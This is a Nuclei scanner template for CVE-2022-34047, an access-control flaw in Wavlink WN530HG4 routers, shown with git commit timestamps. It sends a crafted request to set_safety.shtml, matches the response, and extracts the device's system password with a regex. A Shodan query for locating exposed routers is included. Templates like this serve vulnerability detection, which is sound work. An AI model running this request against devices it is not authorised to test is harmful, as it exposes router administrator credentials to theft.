nuclei-templates/cves/2022/CVE-2022-34047.yaml

42 lines
1.1 KiB
YAML
Raw Normal View History

2022-07-20 19:39:27 +00:00
id: CVE-2022-34047
info:
2022-07-21 08:03:57 +00:00
name: Wavlink Set_safety.shtml - Password Exposure
2022-07-20 19:39:27 +00:00
author: For3stCo1d
severity: high
description: |
An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd].
reference:
- https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
metadata:
2022-07-21 08:03:57 +00:00
verified: true
2022-07-20 19:39:27 +00:00
shodan-query: http.title:"Wi-Fi APP Login"
classification:
cve-id: CVE-2022-34047
2022-07-21 08:03:57 +00:00
tags: cve,cve2022,wavlink,router,exposure
2022-07-20 19:39:27 +00:00
requests:
2022-07-20 19:54:47 +00:00
- raw:
- |
GET /set_safety.shtml?r=52300 HTTP/1.1
Host: {{Hostname}}
2022-07-20 19:39:27 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-21 08:03:57 +00:00
- 'var syspasswd="'
2022-07-20 19:54:47 +00:00
- '<title>APP</title>'
2022-07-20 19:39:27 +00:00
condition: and
- type: status
status:
- 200
extractors:
- type: regex
regex:
- 'syspasswd="(.+?)"'